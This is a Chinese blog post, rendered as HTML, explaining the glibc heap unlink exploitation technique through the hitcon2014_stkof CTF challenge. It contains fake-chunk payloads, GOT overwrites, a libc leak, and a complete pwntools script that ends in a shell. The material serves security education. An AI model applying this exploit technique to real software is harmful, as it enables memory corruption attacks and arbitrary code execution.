

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="清风">
  <meta name="keywords" content="">
  
    <meta name="description" content="堆溢出_unlinkUnlink详解Ulink是什么unlink实际上是libc上定义的一个宏，源码如下 12345678910111213141516171819202122232425262728293031#define unlink(AV, P, BK, FD) &#123;                                                FD &#x3D; P-&amp;gt">
<meta property="og:type" content="article">
<meta property="og:title" content="堆溢出_unlink">
<meta property="og:url" content="http://example.com/2024/09/17/%E5%A0%86%E6%BA%A2%E5%87%BA-unlink/index.html">
<meta property="og:site_name" content="清风不识字">
<meta property="og:description" content="堆溢出_unlinkUnlink详解Ulink是什么unlink实际上是libc上定义的一个宏，源码如下 12345678910111213141516171819202122232425262728293031#define unlink(AV, P, BK, FD) &#123;                                                FD &#x3D; P-&amp;gt">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/129.jpg">
<meta property="article:published_time" content="2024-09-17T13:07:02.000Z">
<meta property="article:modified_time" content="2024-10-09T02:25:33.163Z">
<meta property="article:author" content="清风">
<meta property="article:tag" content="原创">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/129.jpg">
  
  
  
  <title>堆溢出_unlink - 清风不识字</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/scrollAnimation.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="/css/selection.css">
<link rel="stylesheet" href="/css/macBorder.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/gradient.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","app_key":"Q6KrvNK2N7nNsewpWYVdjHuI","server_url":"https://0jwcktnj.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="清风不识字" type="application/atom+xml">
</head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>清风不识字</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="堆溢出_unlink"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-17 21:07" pubdate>
          2024年9月17日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          13 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">堆溢出_unlink</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2024年10月9日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="堆溢出-unlink"><a href="#堆溢出-unlink" class="headerlink" title="堆溢出_unlink"></a>堆溢出_unlink</h1><h4 id="Unlink详解"><a href="#Unlink详解" class="headerlink" title="Unlink详解"></a>Unlink详解</h4><h5 id="Ulink是什么"><a href="#Ulink是什么" class="headerlink" title="Ulink是什么"></a>Ulink是什么</h5><p>unlink实际上是libc上定义的一个宏，源码如下</p>
<figure class="highlight cs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs cs"><span class="hljs-meta">#<span class="hljs-keyword">define</span> unlink(AV, P, BK, FD) &#123;                                            </span><br>    FD = P-&gt;fd;								      <br>    BK = P-&gt;bk;								      <br>    <span class="hljs-keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="hljs-number">0</span>))		      <br>      malloc_printerr (check_action, <span class="hljs-string">&quot;corrupted double-linked list&quot;</span>, P, AV);  <br>    <span class="hljs-keyword">else</span> &#123;								      <br>        FD-&gt;bk = BK;							      <br>        BK-&gt;fd = FD;							      <br>        <span class="hljs-keyword">if</span> (!in_smallbin_range (P-&gt;size)				      <br>            &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != NULL, <span class="hljs-number">0</span>)) &#123;		      <br>	    <span class="hljs-keyword">if</span> (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, <span class="hljs-number">0</span>)	      <br>		|| __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, <span class="hljs-number">0</span>))    <br>	      malloc_printerr (check_action,				      <br>			       <span class="hljs-string">&quot;corrupted double-linked list (not small)&quot;</span>,    <br>			       P, AV);					      <br>            <span class="hljs-keyword">if</span> (FD-&gt;fd_nextsize == NULL) &#123;				      <br>                <span class="hljs-keyword">if</span> (P-&gt;fd_nextsize == P)				      <br>                  FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;		      <br>                <span class="hljs-keyword">else</span> &#123;							      <br>                    FD-&gt;fd_nextsize = P-&gt;fd_nextsize;			      <br>                    FD-&gt;bk_nextsize = P-&gt;bk_nextsize;			      <br>                    P-&gt;fd_nextsize-&gt;bk_nextsize = FD;			      <br>                    P-&gt;bk_nextsize-&gt;fd_nextsize = FD;			      <br>                  &#125;							      <br>              &#125; <span class="hljs-keyword">else</span> &#123;							      <br>                P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;		      <br>                P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;		      <br>              &#125;								      <br>          &#125;								      <br>      &#125;									      <br>&#125;<br></code></pre></td></tr></table></figure>

<p> 但是重要的不是他的源码，而是它在堆溢出中有什么利用</p>
<h5 id="堆的基础知识"><a href="#堆的基础知识" class="headerlink" title="堆的基础知识"></a>堆的基础知识</h5><h4 id="large-free-chunk结构"><a href="#large-free-chunk结构" class="headerlink" title="large free chunk结构"></a>large free chunk结构</h4><p><img src="/img/unlink/a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到一个large free chunk 不包括data的话，最小的大小为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">size=p64(pre_size)+p64(size)+p64(fd)+p64(bk)+p64(fd_next)+p64(bk_next)=<span class="hljs-number">0x30</span><br></code></pre></td></tr></table></figure>

<p> 这会为我们伪造一个free chunk提供条件(在后面会用到）</p>
<h5 id="chunk合并"><a href="#chunk合并" class="headerlink" title="chunk合并"></a>chunk合并</h5><p>我们先来回顾一下堆方面的基础知识，我们知道，当我们free一个大小超过0x90的chunk时，会检查这个chunk物理意义上相邻的前一个chunk是否是空闲状态，如果是，两个chunk会合并成一个大的chunk来合理利用空间。</p>
<p>我们来看示例</p>
<p>申请3个0x80的空间后释放</p>
<p>接着用gdb bin 指令以及heap指令查看</p>
<p><img src="/img/unlink/b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/unlink/c.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到三个空闲chunk彼此连接的，其中fd指针指向上一个chunk的地址，bk指针指向下一个chunk的地址</p>
<h4 id="unlink的过程"><a href="#unlink的过程" class="headerlink" title="unlink的过程"></a>unlink的过程</h4><h5 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h5><p>在hollk师傅的文章中，unlink被通俗易懂的理解为，从三个相互连接的chunk中摘取掉中间的chunk</p>
<p>那么在摘取之后会发生什么呢？</p>
<p><img src="/img/unlink/d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这是没摘取前三个chunk中的联系</p>
<p>当摘取了second_chunk后为了连接first_chunk和third_chunk</p>
<p>fd3会被fd取代，bk1会被bk2取代。</p>
<p><img src="/img/unlink/e.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h5 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h5><p>想象一下，当second_chunk是我们伪造的，fd2,bk2伪造成我们想要写入数据，而first_chunk和third_chunk设置成我们想要写入的地址，是不是可以实现地址任意写，接下来我们通过实际的题目来理解</p>
<h5 id="unlink检查"><a href="#unlink检查" class="headerlink" title="unlink检查"></a>unlink检查</h5><p>在我们用的大多数linux都会对chunk状态进行检查，以免造成二次释放或者二次申请的问题。</p>
<p><strong>检查1</strong>：检查与被释放chunk相邻高地址的chunk的prevsize的值是否等于被释放chunk的size大小</p>
<p>​    当一个chunk是空闲的时候相邻高地址的pre_size域为该chunk的大小</p>
<p><strong>检查2</strong>：检查与被释放chunk相邻高地址的chunk的size的P标志位是否为0</p>
<p><strong>检查3</strong>：检查前后被释放chunk的fd和bk</p>
<h4 id="hitcon2014-stkof"><a href="#hitcon2014-stkof" class="headerlink" title="hitcon2014_stkof"></a><a target="_blank" rel="noopener" href="https://files.buuoj.cn/files/dcd3c0cc561089a3969fba10d626ccf6/warmup_csaw_2016">hitcon2014_stkof</a></h4><h5 id="sub-400936"><a href="#sub-400936" class="headerlink" title="sub_400936"></a>sub_400936</h5><p><img src="/img/unlink/f.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这个函数就是创建chunk,并把地址放在dword_602100</p>
<h5 id="sub-4009E8"><a href="#sub-4009E8" class="headerlink" title="sub_4009E8"></a>sub_4009E8</h5><p><img src="/img/unlink/g.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p> 这个函数可以对chunk进行编辑，同时没有对字符进行限制，存在堆溢出</p>
<p><img src="/img/unlink/h.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h5 id="sub-400B07"><a href="#sub-400B07" class="headerlink" title="sub_400B07"></a>sub_400B07</h5><p> <img src="/img/unlink/i.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p> 这个函数就是简单的free函数</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>首先先建立三个chunk,分别为</p>
<p><strong>chunk1&#x3D;0x1804010</strong></p>
<p><strong>chunk2&#x3D;0x1804460</strong></p>
<p><strong>chunk3&#x3D;0x18044a0</strong></p>
<p><img src="/img/unlink/j.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现有两个chunk是相邻的，因为编辑函数存在堆溢出，可以覆盖下一个chunk的pre_size,size域</p>
<p><img src="/img/unlink/k.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这个地址存着chunk的地址</p>
<p>即head&#x3D;0x602140</p>
<p><img src="/img/unlink/l.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>编辑函数就是利用这里的地址进行操作的，假设我们可以把这里的地址改成别的地址，那么我们就可以利用编辑函数堆这个地址进行操作</p>
<p>那么怎么改呢？我们就可以利用unlink进行地址任意写</p>
<h5 id="伪造second-chunk"><a href="#伪造second-chunk" class="headerlink" title="伪造second_chunk"></a>伪造second_chunk</h5><p>在前面我们知道，unlink利用中最重要的就是second_chunk，但是这里并没有我们可以利用的chunk,那么我们考虑在chunk2的data域伪造一个free_chunk</p>
<p><img src="/img/unlink/m.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/unlink/n.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这是前面提到的，那么我们伪造的second_chunk大小最小为0x30</p>
<p>那么基本结构就是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">fake=second_chunk+p64(<span class="hljs-number">0x30</span>)+p64(<span class="hljs-number">0x90</span>)<br></code></pre></td></tr></table></figure>

<p>这里的p64(0x30)是下一个chunk的pre_size域，p64(0x90)是下一个chunk的大小，目的是为了触发unlink和绕过检查(只有一个大于0x80的chunk释放时才会触发unlink)</p>
<p>那么接下来就是对second_chunk的具体伪造</p>
<p>我们知道伪造的chunk时second_chunk，那么first_chunk的bk指针就应该是chunk2的数据域</p>
<p>即0x1804460+0x10&#x3D;0x1804470</p>
<p>third_chunk的fd指针也是0x1804460+0x10&#x3D;0x180447</p>
<p><img src="/img/unlink/o.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>我们发现，如果把0x602138作为一个chunk的话，那么这个chunk的fd指针刚好满足上面的要求，</p>
<p><img src="/img/unlink/p.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>把0x602140作为一个chunk的话，fd指针也刚好满足要求</p>
<p>所以first_chunk&#x3D;0x602138,third_chunk&#x3D;0x602140</p>
<p>那么second_chunk为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">second_chunk=p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0x30</span>)+p64(<span class="hljs-number">0x602138</span>)+p64(<span class="hljs-number">0x602140</span>)+p64(<span class="hljs-number">0x30</span>)+p64(<span class="hljs-number">90</span>)<br></code></pre></td></tr></table></figure>

<p>因为second_chunk的pre_size域不影响，所以置0即可</p>
<p><img src="/img/unlink/q.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>触发unlink，实现任意写</p>
<p><img src="/img/unlink/r.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">pwndbg&gt; x/30gx <span class="hljs-number">0x602140</span><br><span class="hljs-number">0x602140</span>:	<span class="hljs-number">0x0000000000000000</span>	<span class="hljs-number">0x0000000001804010</span><br><span class="hljs-number">0x602150</span>:	<span class="hljs-number">0x0000000000602038</span>	<span class="hljs-number">0x0000000000000000</span><br><span class="hljs-number">0x602160</span>:	<span class="hljs-number">0x00000000020f8530</span>	<span class="hljs-number">0x0000000000000000</span><br><span class="hljs-number">0x602170</span>:	<span class="hljs-number">0x0000000000000000</span>	<span class="hljs-number">0x0000000000000000</span><br></code></pre></td></tr></table></figure>

<p>可以看到chunk2的地址已被覆盖</p>
<h5 id="泄露基地址"><a href="#泄露基地址" class="headerlink" title="泄露基地址"></a>泄露基地址</h5><p>因为chunk已杯覆盖成0x602038</p>
<p>那么我们可以通过编辑函数进行操作</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">payload=<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+<span class="hljs-built_in">p64</span>(free_got)+<span class="hljs-built_in">p64</span>(puts_got)<br><span class="hljs-function"><span class="hljs-title">fill</span><span class="hljs-params">(<span class="hljs-number">2</span>,payload)</span></span><br></code></pre></td></tr></table></figure>

<p>把chunk1和chunk2的地址覆盖成free函数和puts函数</p>
<p><img src="/img/unlink/s.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>此时我们调用free(2)时便可泄露基地址</p>
<h5 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h5><p>接着我们使用编辑函数，把free函数got写成system</p>
<p><img src="/img/unlink/t.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/unlink/u.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/unlink/v.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>最后创建一个chunk存放&#x2F;bin&#x2F;sh后释放，getshell</p>
<p><img src="/img/unlink/w.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="完整的exp"><a href="#完整的exp" class="headerlink" title="完整的exp"></a>完整的exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p = process(<span class="hljs-string">&#x27;./stkof&#x27;</span>)<br><span class="hljs-comment">#p=remote(&quot;node5.buuoj.cn&quot;,&#x27;28668&#x27;)</span><br>p=process(<span class="hljs-string">&#x27;./stkof&#x27;</span>)<br><span class="hljs-comment">#context.log_level = &#x27;debug&#x27;</span><br><span class="hljs-comment">#gdb.attach(p)</span><br>elf = ELF(<span class="hljs-string">&quot;./stkof&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc-2.23.so&quot;</span>)<br><br>free_got = elf.got[<span class="hljs-string">&#x27;free&#x27;</span>]<br>puts_got = elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_plt = elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">alloc</span>(<span class="hljs-params">size</span>):<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br>    p.sendline(<span class="hljs-built_in">str</span>(size))<br>    p.recvuntil(<span class="hljs-string">&quot;OK&quot;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">fill</span>(<span class="hljs-params">idx,content</span>):<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-number">2</span>))<br>    p.sendline(<span class="hljs-built_in">str</span>(idx))<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-built_in">len</span>(content)))<br>    p.sendline(content)<br>    p.recvuntil(<span class="hljs-string">&quot;OK&quot;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">idx</span>):<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-number">3</span>))<br>    p.sendline(<span class="hljs-built_in">str</span>(idx))<br><br>alloc(<span class="hljs-number">0x30</span>)<br>alloc(<span class="hljs-number">0x30</span>)<br>alloc(<span class="hljs-number">0x80</span>)<br>alloc(<span class="hljs-number">0x30</span>)<br>fake=p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0x30</span>)+p64(<span class="hljs-number">0x602138</span>)+p64(<span class="hljs-number">0x602140</span>)+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span>+p64(<span class="hljs-number">0x30</span>)+p64(<span class="hljs-number">0x90</span>)<br>fill(<span class="hljs-number">2</span>,fake)<br>free(<span class="hljs-number">3</span>)<br>payload=p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+p64(free_got)+p64(puts_got)<br>fill(<span class="hljs-number">2</span>,payload)<br>payload=p64(puts_plt)<br>fill(<span class="hljs-number">1</span>,payload)<br>free(<span class="hljs-number">2</span>)<br>real=u64(p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(real))<br>base=real-<span class="hljs-number">0x6f690</span><br>system=base+<span class="hljs-number">0x45390</span><br>fill(<span class="hljs-number">1</span>,p64(system))<br>fill(<span class="hljs-number">4</span>,<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>)<br>free(<span class="hljs-number">4</span>)<br><br>p.interactive()<br><span class="hljs-comment">#pause()</span><br></code></pre></td></tr></table></figure>

<h4 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h4><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/108481889">好好说话之unlink</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43935969/article/details/115921797">hitcon2014_stkof详解</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%A0%86%E5%88%A9%E7%94%A8/" class="category-chain-item">堆利用</a>
  
  
    <span>></span>
    
  <a href="/categories/%E5%A0%86%E5%88%A9%E7%94%A8/python/" class="category-chain-item">python</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8E%9F%E5%88%9B/" class="print-no-link">#原创</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>堆溢出_unlink</div>
      <div>http://example.com/2024/09/17/堆溢出-unlink/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>清风</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/09/24/%E5%AF%B9%E7%AD%89%E4%BF%9D2-0%E7%9A%84%E7%90%86%E8%A7%A3/" title="对等保2.0的理解">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">对等保2.0的理解</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/25/%E5%A0%86%E5%88%A9%E7%94%A8-overlapping/" title="堆利用_overlapping">
                        <span class="hidden-mobile">堆利用_overlapping</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","appKey":"Q6KrvNK2N7nNsewpWYVdjHuI","path":"window.location.pathname","placeholder":"说点什么","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
